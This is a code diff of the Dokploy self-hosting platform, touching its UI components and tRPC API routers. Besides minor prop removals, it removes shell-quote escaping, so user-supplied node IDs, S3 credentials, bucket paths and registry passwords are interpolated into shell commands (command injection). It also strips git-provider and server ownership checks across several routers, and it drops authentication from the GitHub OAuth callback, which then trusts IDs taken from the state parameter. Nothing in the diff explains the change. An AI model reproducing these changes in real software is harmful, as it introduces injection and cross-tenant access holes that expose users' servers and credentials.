appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.postgresId}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
> >
<Button <Button

View File

@@ -229,7 +229,6 @@ export const ShowGeneralRedis = ({ redisId }: Props) => {
</TooltipProvider> </TooltipProvider>
<DockerTerminalModal <DockerTerminalModal
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.redisId}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
> >
<Button <Button

View File

@@ -1932,7 +1932,8 @@ export const HandleNotifications = ({ notificationId }: Props) => {
<div className="space-y-0.5"> <div className="space-y-0.5">
<FormLabel>Docker Cleanup</FormLabel> <FormLabel>Docker Cleanup</FormLabel>
<FormDescription> <FormDescription>
Trigger the action when Docker cleanup is performed. Trigger the action when Docker cleanup is
performed.
</FormDescription> </FormDescription>
</div> </div>
<FormControl> <FormControl>

View File

@@ -40,7 +40,6 @@ interface Props {
children?: React.ReactNode; children?: React.ReactNode;
serverId?: string; serverId?: string;
appType?: "stack" | "docker-compose"; appType?: "stack" | "docker-compose";
serviceId?: string;
} }
export const DockerTerminalModal = ({ export const DockerTerminalModal = ({
@@ -48,7 +47,6 @@ export const DockerTerminalModal = ({
appName, appName,
serverId, serverId,
appType, appType,
serviceId,
}: Props) => { }: Props) => {
const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery( const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery(
{ {
@@ -133,7 +131,6 @@ export const DockerTerminalModal = ({
serverId={serverId || ""} serverId={serverId || ""}
id="terminal" id="terminal"
containerId={containerId || "select-a-container"} containerId={containerId || "select-a-container"}
serviceId={serviceId}
/> />
<Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}> <Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}>
<DialogContent onEscapeKeyDown={(event) => event.preventDefault()}> <DialogContent onEscapeKeyDown={(event) => event.preventDefault()}>

View File

@@ -648,7 +648,7 @@ function SidebarLogo() {
</SidebarMenuButton> </SidebarMenuButton>
</DropdownMenuTrigger> </DropdownMenuTrigger>
<DropdownMenuContent <DropdownMenuContent
className="w-64 rounded-lg max-h-[min(70vh,28rem)] flex flex-col" className="rounded-lg max-h-[min(70vh,28rem)] flex flex-col"
align="start" align="start"
side={isMobile ? "bottom" : "right"} side={isMobile ? "bottom" : "right"}
sideOffset={4} sideOffset={4}

View File

@@ -1,6 +1,5 @@
import { createGithub, validateRequest } from "@dokploy/server"; import { createGithub } from "@dokploy/server";
import { db } from "@dokploy/server/db"; import { db } from "@dokploy/server/db";
import { hasPermission } from "@dokploy/server/services/permission";
import { eq } from "drizzle-orm"; import { eq } from "drizzle-orm";
import type { NextApiRequest, NextApiResponse } from "next"; import type { NextApiRequest, NextApiResponse } from "next";
import { Octokit } from "octokit"; import { Octokit } from "octokit";
@@ -22,22 +21,18 @@ export default async function handler(
if (!code) { if (!code) {
return res.status(400).json({ error: "Missing code parameter" }); return res.status(400).json({ error: "Missing code parameter" });
} }
const [action, ...rest] = state?.split(":");
const { user, session } = await validateRequest(req); // For gh_init: rest[0] = organizationId, rest[1] = userId
if (!user || !session?.activeOrganizationId) { // For gh_setup: rest[0] = githubProviderId
return res.status(401).json({ error: "Unauthorized" });
}
const ctx = {
user: { id: user.id },
session: { activeOrganizationId: session.activeOrganizationId },
};
const [action] = state?.split(":") ?? [];
if (!(await hasPermission(ctx, { gitProviders: ["create"] }))) {
return res.status(403).json({ error: "Forbidden" });
}
if (action === "gh_init") { if (action === "gh_init") {
const organizationId = rest[0];
const userId = rest[1] || (req.query.userId as string);
if (!userId) {
return res.status(400).json({ error: "Missing userId parameter" });
}
const octokit = new Octokit({}); const octokit = new Octokit({});
const { data } = await octokit.request( const { data } = await octokit.request(
"POST /app-manifests/{code}/conversions", "POST /app-manifests/{code}/conversions",
@@ -56,32 +51,16 @@ export default async function handler(
githubWebhookSecret: data.webhook_secret, githubWebhookSecret: data.webhook_secret,
githubPrivateKey: data.pem, githubPrivateKey: data.pem,
}, },
session.activeOrganizationId, organizationId as string,
user.id, userId,
); );
} else if (action === "gh_setup") { } else if (action === "gh_setup") {
const githubId = state?.split(":")[1];
if (!githubId) {
return res.status(400).json({ error: "Missing github provider id" });
}
const provider = await db.query.github.findFirst({
where: eq(github.githubId, githubId),
with: { gitProvider: true },
});
if (
!provider ||
provider.gitProvider.organizationId !== session.activeOrganizationId
) {
return res.status(404).json({ error: "Github provider not found" });
}
await db await db
.update(github) .update(github)
.set({ .set({
githubInstallationId: installation_id, githubInstallationId: installation_id,
}) })
.where(eq(github.githubId, githubId)) .where(eq(github.githubId, rest[0] as string))
.returning(); .returning();
} }

View File

@@ -347,7 +347,6 @@ const Service = (
<ShowDockerLogs <ShowDockerLogs
appName={data?.appName || ""} appName={data?.appName || ""}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
serviceId={data?.applicationId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -312,7 +312,6 @@ const Service = (
serverId={data?.serverId || undefined} serverId={data?.serverId || undefined}
appName={data?.appName || ""} appName={data?.appName || ""}
appType={data?.composeType || "docker-compose"} appType={data?.composeType || "docker-compose"}
serviceId={data?.composeId}
/> />
</div> </div>
</TabsContent> </TabsContent>
@@ -381,13 +380,11 @@ const Service = (
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
appType={data?.composeType || "docker-compose"} appType={data?.composeType || "docker-compose"}
serviceId={data?.composeId}
/> />
) : ( ) : (
<ShowDockerLogsStack <ShowDockerLogsStack
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.composeId}
/> />
)} )}
</div> </div>

View File

@@ -269,7 +269,6 @@ const Libsql = (
<ShowDockerLogs <ShowDockerLogs
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.libsqlId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -299,7 +299,6 @@ const Mariadb = (
<ShowDockerLogs <ShowDockerLogs
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.mariadbId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -299,7 +299,6 @@ const Mongo = (
<ShowDockerLogs <ShowDockerLogs
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.mongoId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -276,7 +276,6 @@ const MySql = (
<ShowDockerLogs <ShowDockerLogs
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.mysqlId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -284,7 +284,6 @@ const Postgresql = (
<ShowDockerLogs <ShowDockerLogs
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.postgresId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -297,7 +297,6 @@ const Redis = (
<ShowDockerLogs <ShowDockerLogs
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.redisId}
/> />
</div> </div>
</TabsContent> </TabsContent>

View File

@@ -49,7 +49,6 @@ import {
restoreWebServerBackup, restoreWebServerBackup,
} from "@dokploy/server/utils/restore"; } from "@dokploy/server/utils/restore";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { quote } from "shell-quote";
import { z } from "zod"; import { z } from "zod";
import { import {
createTRPCRouter, createTRPCRouter,
@@ -511,7 +510,7 @@ export const backupRouter = createTRPCRouter({
: input.search; : input.search;
const searchPath = baseDir ? `${bucketPath}/${baseDir}` : bucketPath; const searchPath = baseDir ? `${bucketPath}/${baseDir}` : bucketPath;
const listCommand = `rclone lsjson ${rcloneFlags.join(" ")} ${quote([searchPath])} --no-mimetype --no-modtime 2>/dev/null`; const listCommand = `rclone lsjson ${rcloneFlags.join(" ")} "${searchPath}" --no-mimetype --no-modtime 2>/dev/null`;
let stdout = ""; let stdout = "";

View File

@@ -1,5 +1,4 @@
import { import {
assertGitProviderAccess,
createBitbucket, createBitbucket,
findBitbucketById, findBitbucketById,
getAccessibleGitProviderIds, getAccessibleGitProviderIds,
@@ -52,10 +51,8 @@ export const bitbucketRouter = createTRPCRouter({
}), }),
one: protectedProcedure one: protectedProcedure
.input(apiFindOneBitbucket) .input(apiFindOneBitbucket)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
const bitbucket = await findBitbucketById(input.bitbucketId); return await findBitbucketById(input.bitbucketId);
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
return bitbucket;
}), }),
bitbucketProviders: protectedProcedure.query(async ({ ctx }) => { bitbucketProviders: protectedProcedure.query(async ({ ctx }) => {
const accessibleIds = await getAccessibleGitProviderIds(ctx.session); const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
@@ -81,26 +78,18 @@ export const bitbucketRouter = createTRPCRouter({
getBitbucketRepositories: protectedProcedure getBitbucketRepositories: protectedProcedure
.input(apiFindOneBitbucket) .input(apiFindOneBitbucket)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
const bitbucket = await findBitbucketById(input.bitbucketId);
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
return await getBitbucketRepositories(input.bitbucketId); return await getBitbucketRepositories(input.bitbucketId);
}), }),
getBitbucketBranches: protectedProcedure getBitbucketBranches: protectedProcedure
.input(apiFindBitbucketBranches) .input(apiFindBitbucketBranches)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.bitbucketId) {
const bitbucket = await findBitbucketById(input.bitbucketId);
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
}
return await getBitbucketBranches(input); return await getBitbucketBranches(input);
}), }),
testConnection: protectedProcedure testConnection: protectedProcedure
.input(apiBitbucketTestConnection) .input(apiBitbucketTestConnection)
.mutation(async ({ input, ctx }) => { .mutation(async ({ input }) => {
try { try {
const bitbucket = await findBitbucketById(input.bitbucketId);
await assertGitProviderAccess(ctx.session, bitbucket.gitProvider);
const result = await testBitbucketConnection(input); const result = await testBitbucketConnection(input);
return `Found ${result} repositories`; return `Found ${result} repositories`;

View File

@@ -6,7 +6,6 @@ import {
getRemoteDocker, getRemoteDocker,
} from "@dokploy/server"; } from "@dokploy/server";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { quote } from "shell-quote";
import { z } from "zod"; import { z } from "zod";
import { audit } from "@/server/api/utils/audit"; import { audit } from "@/server/api/utils/audit";
import { getLocalServerIp } from "@/server/wss/terminal"; import { getLocalServerIp } from "@/server/wss/terminal";
@@ -52,8 +51,8 @@ export const clusterRouter = createTRPCRouter({
} }
} }
try { try {
const drainCommand = `docker node update --availability drain ${quote([input.nodeId])}`; const drainCommand = `docker node update --availability drain ${input.nodeId}`;
const removeCommand = `docker node rm ${quote([input.nodeId])} --force`; const removeCommand = `docker node rm ${input.nodeId} --force`;
if (input.serverId) { if (input.serverId) {
await execAsyncRemote(input.serverId, drainCommand); await execAsyncRemote(input.serverId, drainCommand);

View File

@@ -10,7 +10,6 @@ import {
import { db } from "@dokploy/server/db"; import { db } from "@dokploy/server/db";
import { TRPCError } from "@trpc/server"; import { TRPCError } from "@trpc/server";
import { desc, eq } from "drizzle-orm"; import { desc, eq } from "drizzle-orm";
import { quote } from "shell-quote";
import { createTRPCRouter, withPermission } from "@/server/api/trpc"; import { createTRPCRouter, withPermission } from "@/server/api/trpc";
import { audit } from "@/server/api/utils/audit"; import { audit } from "@/server/api/utils/audit";
import { import {
@@ -59,10 +58,10 @@ export const destinationRouter = createTRPCRouter({
} = input; } = input;
try { try {
const rcloneFlags = [ const rcloneFlags = [
`--s3-access-key-id=${quote([accessKey])}`, `--s3-access-key-id="${accessKey}"`,
`--s3-secret-access-key=${quote([secretAccessKey])}`, `--s3-secret-access-key="${secretAccessKey}"`,
`--s3-region=${quote([region])}`, `--s3-region="${region}"`,
`--s3-endpoint=${quote([endpoint])}`, `--s3-endpoint="${endpoint}"`,
"--s3-no-check-bucket", "--s3-no-check-bucket",
"--s3-force-path-style", "--s3-force-path-style",
"--retries 1", "--retries 1",
@@ -71,13 +70,13 @@ export const destinationRouter = createTRPCRouter({
"--contimeout 5s", "--contimeout 5s",
]; ];
if (provider) { if (provider) {
rcloneFlags.unshift(`--s3-provider=${quote([provider])}`); rcloneFlags.unshift(`--s3-provider="${provider}"`);
} }
if (additionalFlags?.length) { if (additionalFlags?.length) {
rcloneFlags.push(...additionalFlags); rcloneFlags.push(...additionalFlags);
} }
const rcloneDestination = `:s3:${bucket}`; const rcloneDestination = `:s3:${bucket}`;
const rcloneCommand = `rclone ls ${rcloneFlags.join(" ")} ${quote([rcloneDestination])}`; const rcloneCommand = `rclone ls ${rcloneFlags.join(" ")} "${rcloneDestination}"`;
if (IS_CLOUD && !input.serverId) { if (IS_CLOUD && !input.serverId) {
throw new TRPCError({ throw new TRPCError({

View File

@@ -1,5 +1,4 @@
import { import {
assertGitProviderAccess,
createGitea, createGitea,
findGiteaById, findGiteaById,
getAccessibleGitProviderIds, getAccessibleGitProviderIds,
@@ -54,13 +53,9 @@ export const giteaRouter = createTRPCRouter({
} }
}), }),
one: protectedProcedure one: protectedProcedure.input(apiFindOneGitea).query(async ({ input }) => {
.input(apiFindOneGitea) return await findGiteaById(input.giteaId);
.query(async ({ input, ctx }) => { }),
const gitea = await findGiteaById(input.giteaId);
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
return gitea;
}),
giteaProviders: protectedProcedure.query(async ({ ctx }) => { giteaProviders: protectedProcedure.query(async ({ ctx }) => {
const accessibleIds = await getAccessibleGitProviderIds(ctx.session); const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
@@ -94,7 +89,7 @@ export const giteaRouter = createTRPCRouter({
getGiteaRepositories: protectedProcedure getGiteaRepositories: protectedProcedure
.input(apiFindOneGitea) .input(apiFindOneGitea)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
const { giteaId } = input; const { giteaId } = input;
if (!giteaId) { if (!giteaId) {
@@ -104,9 +99,6 @@ export const giteaRouter = createTRPCRouter({
}); });
} }
const gitea = await findGiteaById(giteaId);
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
try { try {
const repositories = await getGiteaRepositories(giteaId); const repositories = await getGiteaRepositories(giteaId);
return repositories; return repositories;
@@ -121,7 +113,7 @@ export const giteaRouter = createTRPCRouter({
getGiteaBranches: protectedProcedure getGiteaBranches: protectedProcedure
.input(apiFindGiteaBranches) .input(apiFindGiteaBranches)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
const { giteaId, owner, repositoryName } = input; const { giteaId, owner, repositoryName } = input;
if (!giteaId || !owner || !repositoryName) { if (!giteaId || !owner || !repositoryName) {
@@ -132,9 +124,6 @@ export const giteaRouter = createTRPCRouter({
}); });
} }
const gitea = await findGiteaById(giteaId);
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
try { try {
return await getGiteaBranches({ return await getGiteaBranches({
giteaId, giteaId,
@@ -152,12 +141,9 @@ export const giteaRouter = createTRPCRouter({
testConnection: protectedProcedure testConnection: protectedProcedure
.input(apiGiteaTestConnection) .input(apiGiteaTestConnection)
.mutation(async ({ input, ctx }) => { .mutation(async ({ input }) => {
const giteaId = input.giteaId ?? ""; const giteaId = input.giteaId ?? "";
const gitea = await findGiteaById(giteaId);
await assertGitProviderAccess(ctx.session, gitea.gitProvider);
try { try {
const result = await testGiteaConnection({ const result = await testGiteaConnection({
giteaId, giteaId,

View File

@@ -1,5 +1,4 @@
import { import {
assertGitProviderAccess,
findGithubById, findGithubById,
getAccessibleGitProviderIds, getAccessibleGitProviderIds,
getGithubBranches, getGithubBranches,
@@ -23,27 +22,17 @@ import {
} from "@/server/db/schema"; } from "@/server/db/schema";
export const githubRouter = createTRPCRouter({ export const githubRouter = createTRPCRouter({
one: protectedProcedure one: protectedProcedure.input(apiFindOneGithub).query(async ({ input }) => {
.input(apiFindOneGithub) return await findGithubById(input.githubId);
.query(async ({ input, ctx }) => { }),
const github = await findGithubById(input.githubId);
await assertGitProviderAccess(ctx.session, github.gitProvider);
return github;
}),
getGithubRepositories: protectedProcedure getGithubRepositories: protectedProcedure
.input(apiFindOneGithub) .input(apiFindOneGithub)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
const github = await findGithubById(input.githubId);
await assertGitProviderAccess(ctx.session, github.gitProvider);
return await getGithubRepositories(input.githubId); return await getGithubRepositories(input.githubId);
}), }),
getGithubBranches: protectedProcedure getGithubBranches: protectedProcedure
.input(apiFindGithubBranches) .input(apiFindGithubBranches)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.githubId) {
const github = await findGithubById(input.githubId);
await assertGitProviderAccess(ctx.session, github.gitProvider);
}
return await getGithubBranches(input); return await getGithubBranches(input);
}), }),
githubProviders: protectedProcedure.query(async ({ ctx }) => { githubProviders: protectedProcedure.query(async ({ ctx }) => {
@@ -78,10 +67,8 @@ export const githubRouter = createTRPCRouter({
testConnection: protectedProcedure testConnection: protectedProcedure
.input(apiFindOneGithub) .input(apiFindOneGithub)
.mutation(async ({ input, ctx }) => { .mutation(async ({ input }) => {
try { try {
const github = await findGithubById(input.githubId);
await assertGitProviderAccess(ctx.session, github.gitProvider);
const result = await getGithubRepositories(input.githubId); const result = await getGithubRepositories(input.githubId);
return `Found ${result.length} repositories`; return `Found ${result.length} repositories`;
} catch (err) { } catch (err) {

View File

@@ -1,5 +1,4 @@
import { import {
assertGitProviderAccess,
createGitlab, createGitlab,
findGitlabById, findGitlabById,
getAccessibleGitProviderIds, getAccessibleGitProviderIds,
@@ -52,13 +51,9 @@ export const gitlabRouter = createTRPCRouter({
}); });
} }
}), }),
one: protectedProcedure one: protectedProcedure.input(apiFindOneGitlab).query(async ({ input }) => {
.input(apiFindOneGitlab) return await findGitlabById(input.gitlabId);
.query(async ({ input, ctx }) => { }),
const gitlab = await findGitlabById(input.gitlabId);
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
return gitlab;
}),
gitlabProviders: protectedProcedure.query(async ({ ctx }) => { gitlabProviders: protectedProcedure.query(async ({ ctx }) => {
const accessibleIds = await getAccessibleGitProviderIds(ctx.session); const accessibleIds = await getAccessibleGitProviderIds(ctx.session);
@@ -91,27 +86,19 @@ export const gitlabRouter = createTRPCRouter({
}), }),
getGitlabRepositories: protectedProcedure getGitlabRepositories: protectedProcedure
.input(apiFindOneGitlab) .input(apiFindOneGitlab)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
const gitlab = await findGitlabById(input.gitlabId);
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
return await getGitlabRepositories(input.gitlabId); return await getGitlabRepositories(input.gitlabId);
}), }),
getGitlabBranches: protectedProcedure getGitlabBranches: protectedProcedure
.input(apiFindGitlabBranches) .input(apiFindGitlabBranches)
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.gitlabId) {
const gitlab = await findGitlabById(input.gitlabId);
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
}
return await getGitlabBranches(input); return await getGitlabBranches(input);
}), }),
testConnection: protectedProcedure testConnection: protectedProcedure
.input(apiGitlabTestConnection) .input(apiGitlabTestConnection)
.mutation(async ({ input, ctx }) => { .mutation(async ({ input }) => {
try { try {
const gitlab = await findGitlabById(input.gitlabId);
await assertGitProviderAccess(ctx.session, gitlab.gitProvider);
const result = await testGitlabConnection(input); const result = await testGitlabConnection(input);
return `Found ${result} repositories`; return `Found ${result} repositories`;

View File

@@ -5,7 +5,6 @@ import {
findRegistryById, findRegistryById,
IS_CLOUD, IS_CLOUD,
removeRegistry, removeRegistry,
safeDockerLoginCommand,
updateRegistry, updateRegistry,
} from "@dokploy/server"; } from "@dokploy/server";
import { db } from "@dokploy/server/db"; import { db } from "@dokploy/server/db";
@@ -123,11 +122,7 @@ export const registryRouter = createTRPCRouter({
if (input.serverId && input.serverId !== "none") { if (input.serverId && input.serverId !== "none") {
await execAsyncRemote( await execAsyncRemote(
input.serverId, input.serverId,
safeDockerLoginCommand( `echo ${input.password} | docker ${args.join(" ")}`,
input.registryUrl,
input.username,
input.password,
),
); );
} else { } else {
await execFileAsync("docker", args, { await execFileAsync("docker", args, {
@@ -187,11 +182,7 @@ export const registryRouter = createTRPCRouter({
if (input.serverId && input.serverId !== "none") { if (input.serverId && input.serverId !== "none") {
await execAsyncRemote( await execAsyncRemote(
input.serverId, input.serverId,
safeDockerLoginCommand( `echo ${registryData.password} | docker ${args.join(" ")}`,
registryData.registryUrl,
registryData.username,
registryData.password,
),
); );
} else { } else {
await execFileAsync("docker", args, { await execFileAsync("docker", args, {

View File

@@ -13,7 +13,6 @@ import {
findMemberByUserId, findMemberByUserId,
} from "@dokploy/server/services/permission"; } from "@dokploy/server/services/permission";
import { import {
assertHostScheduleAccess,
createSchedule, createSchedule,
deleteSchedule, deleteSchedule,
findScheduleById, findScheduleById,
@@ -32,8 +31,6 @@ export const scheduleRouter = createTRPCRouter({
create: protectedProcedure create: protectedProcedure
.input(createScheduleSchema) .input(createScheduleSchema)
.mutation(async ({ input, ctx }) => { .mutation(async ({ input, ctx }) => {
await assertHostScheduleAccess(ctx, input.scheduleType, input.serverId);
const serviceId = input.applicationId || input.composeId; const serviceId = input.applicationId || input.composeId;
if (serviceId) { if (serviceId) {
await checkServicePermissionAndAccess(ctx, serviceId, { await checkServicePermissionAndAccess(ctx, serviceId, {
@@ -47,14 +44,51 @@ export const scheduleRouter = createTRPCRouter({
); );
} }
} else { } else {
if (input.scheduleType === "dokploy-server" && IS_CLOUD) {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Host-level schedules are not available in the cloud version.",
});
}
await checkPermission(ctx, { schedule: ["create"] }); await checkPermission(ctx, { schedule: ["create"] });
if (IS_CLOUD && input.scheduleType === "server" && input.serverId) { if (
await assertScheduledJobLimit( input.scheduleType === "server" ||
input.scheduleType === "dokploy-server"
) {
const member = await findMemberByUserId(
ctx.user.id,
ctx.session.activeOrganizationId, ctx.session.activeOrganizationId,
"server",
input.serverId,
); );
if (member.role !== "owner" && member.role !== "admin") {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Only owners and admins can manage server-level schedules.",
});
}
}
if (input.scheduleType === "server" && input.serverId) {
const targetServer = await findServerById(input.serverId);
if (
targetServer.organizationId !== ctx.session.activeOrganizationId
) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You don't have access to this server.",
});
}
if (IS_CLOUD) {
await assertScheduledJobLimit(
ctx.session.activeOrganizationId,
"server",
input.serverId,
);
}
} }
} }
const newSchedule = await createSchedule({ const newSchedule = await createSchedule({
@@ -101,22 +135,6 @@ export const scheduleRouter = createTRPCRouter({
}); });
} }
await assertHostScheduleAccess(
ctx,
existingSchedule.scheduleType,
existingSchedule.serverId,
);
if (
input.scheduleType &&
input.scheduleType !== existingSchedule.scheduleType
) {
await assertHostScheduleAccess(
ctx,
input.scheduleType,
input.serverId ?? existingSchedule.serverId,
);
}
const serviceId = const serviceId =
existingSchedule.applicationId || existingSchedule.composeId; existingSchedule.applicationId || existingSchedule.composeId;
if (serviceId) { if (serviceId) {
@@ -124,7 +142,47 @@ export const scheduleRouter = createTRPCRouter({
schedule: ["update"], schedule: ["update"],
}); });
} else { } else {
if (existingSchedule.scheduleType === "dokploy-server" && IS_CLOUD) {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Host-level schedules are not available in the cloud version.",
});
}
await checkPermission(ctx, { schedule: ["update"] }); await checkPermission(ctx, { schedule: ["update"] });
if (
existingSchedule.scheduleType === "server" ||
existingSchedule.scheduleType === "dokploy-server"
) {
const member = await findMemberByUserId(
ctx.user.id,
ctx.session.activeOrganizationId,
);
if (member.role !== "owner" && member.role !== "admin") {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Only owners and admins can manage server-level schedules.",
});
}
}
if (
existingSchedule.scheduleType === "server" &&
existingSchedule.serverId
) {
const targetServer = await findServerById(existingSchedule.serverId);
if (
targetServer.organizationId !== ctx.session.activeOrganizationId
) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You don't have access to this server.",
});
}
}
} }
const updatedSchedule = await updateSchedule(input); const updatedSchedule = await updateSchedule(input);
@@ -164,19 +222,50 @@ export const scheduleRouter = createTRPCRouter({
.input(z.object({ scheduleId: z.string() })) .input(z.object({ scheduleId: z.string() }))
.mutation(async ({ input, ctx }) => { .mutation(async ({ input, ctx }) => {
const scheduleItem = await findScheduleById(input.scheduleId); const scheduleItem = await findScheduleById(input.scheduleId);
await assertHostScheduleAccess(
ctx,
scheduleItem.scheduleType,
scheduleItem.serverId,
);
const serviceId = scheduleItem.applicationId || scheduleItem.composeId; const serviceId = scheduleItem.applicationId || scheduleItem.composeId;
if (serviceId) { if (serviceId) {
await checkServicePermissionAndAccess(ctx, serviceId, { await checkServicePermissionAndAccess(ctx, serviceId, {
schedule: ["delete"], schedule: ["delete"],
}); });
} else { } else {
if (scheduleItem.scheduleType === "dokploy-server" && IS_CLOUD) {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Host-level schedules are not available in the cloud version.",
});
}
await checkPermission(ctx, { schedule: ["delete"] }); await checkPermission(ctx, { schedule: ["delete"] });
if (
scheduleItem.scheduleType === "server" ||
scheduleItem.scheduleType === "dokploy-server"
) {
const member = await findMemberByUserId(
ctx.user.id,
ctx.session.activeOrganizationId,
);
if (member.role !== "owner" && member.role !== "admin") {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Only owners and admins can manage server-level schedules.",
});
}
}
if (scheduleItem.scheduleType === "server" && scheduleItem.serverId) {
const targetServer = await findServerById(scheduleItem.serverId);
if (
targetServer.organizationId !== ctx.session.activeOrganizationId
) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You don't have access to this server.",
});
}
}
} }
await deleteSchedule(input.scheduleId); await deleteSchedule(input.scheduleId);
@@ -300,19 +389,50 @@ export const scheduleRouter = createTRPCRouter({
.input(z.object({ scheduleId: z.string().min(1) })) .input(z.object({ scheduleId: z.string().min(1) }))
.mutation(async ({ input, ctx }) => { .mutation(async ({ input, ctx }) => {
const scheduleItem = await findScheduleById(input.scheduleId); const scheduleItem = await findScheduleById(input.scheduleId);
await assertHostScheduleAccess(
ctx,
scheduleItem.scheduleType,
scheduleItem.serverId,
);
const serviceId = scheduleItem.applicationId || scheduleItem.composeId; const serviceId = scheduleItem.applicationId || scheduleItem.composeId;
if (serviceId) { if (serviceId) {
await checkServicePermissionAndAccess(ctx, serviceId, { await checkServicePermissionAndAccess(ctx, serviceId, {
schedule: ["create"], schedule: ["create"],
}); });
} else { } else {
if (scheduleItem.scheduleType === "dokploy-server" && IS_CLOUD) {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Host-level schedules are not available in the cloud version.",
});
}
await checkPermission(ctx, { schedule: ["create"] }); await checkPermission(ctx, { schedule: ["create"] });
if (
scheduleItem.scheduleType === "server" ||
scheduleItem.scheduleType === "dokploy-server"
) {
const member = await findMemberByUserId(
ctx.user.id,
ctx.session.activeOrganizationId,
);
if (member.role !== "owner" && member.role !== "admin") {
throw new TRPCError({
code: "FORBIDDEN",
message:
"Only owners and admins can manage server-level schedules.",
});
}
}
if (scheduleItem.scheduleType === "server" && scheduleItem.serverId) {
const targetServer = await findServerById(scheduleItem.serverId);
if (
targetServer.organizationId !== ctx.session.activeOrganizationId
) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You don't have access to this server.",
});
}
}
} }
try { try {
await runCommand(input.scheduleId); await runCommand(input.scheduleId);

View File

@@ -413,14 +413,6 @@ export const serverRouter = createTRPCRouter({
.input(apiRemoveServer) .input(apiRemoveServer)
.mutation(async ({ input, ctx }) => { .mutation(async ({ input, ctx }) => {
try { try {
const currentServer = await findServerById(input.serverId);
if (currentServer.organizationId !== ctx.session.activeOrganizationId) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You are not authorized to delete this server",
});
}
const activeServers = await haveActiveServices(input.serverId); const activeServers = await haveActiveServices(input.serverId);
if (activeServers) { if (activeServers) {
@@ -429,6 +421,7 @@ export const serverRouter = createTRPCRouter({
message: "Server has active services, please delete them first", message: "Server has active services, please delete them first",
}); });
} }
const currentServer = await findServerById(input.serverId);
await audit(ctx, { await audit(ctx, {
action: "delete", action: "delete",
resourceType: "server", resourceType: "server",

View File

@@ -18,30 +18,12 @@ export const swarmRouter = createTRPCRouter({
serverId: z.string().optional(), serverId: z.string().optional(),
}), }),
) )
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.serverId) {
const server = await findServerById(input.serverId);
if (server.organizationId !== ctx.session?.activeOrganizationId) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You are not authorized to access this server",
});
}
}
return await getSwarmNodes(input.serverId); return await getSwarmNodes(input.serverId);
}), }),
getNodeInfo: withPermission("server", "read") getNodeInfo: withPermission("server", "read")
.input(z.object({ nodeId: z.string(), serverId: z.string().optional() })) .input(z.object({ nodeId: z.string(), serverId: z.string().optional() }))
.query(async ({ input, ctx }) => { .query(async ({ input }) => {
if (input.serverId) {
const server = await findServerById(input.serverId);
if (server.organizationId !== ctx.session?.activeOrganizationId) {
throw new TRPCError({
code: "UNAUTHORIZED",
message: "You are not authorized to access this server",
});
}
}
return await getNodeInfo(input.nodeId, input.serverId); return await getNodeInfo(input.nodeId, input.serverId);
}), }),
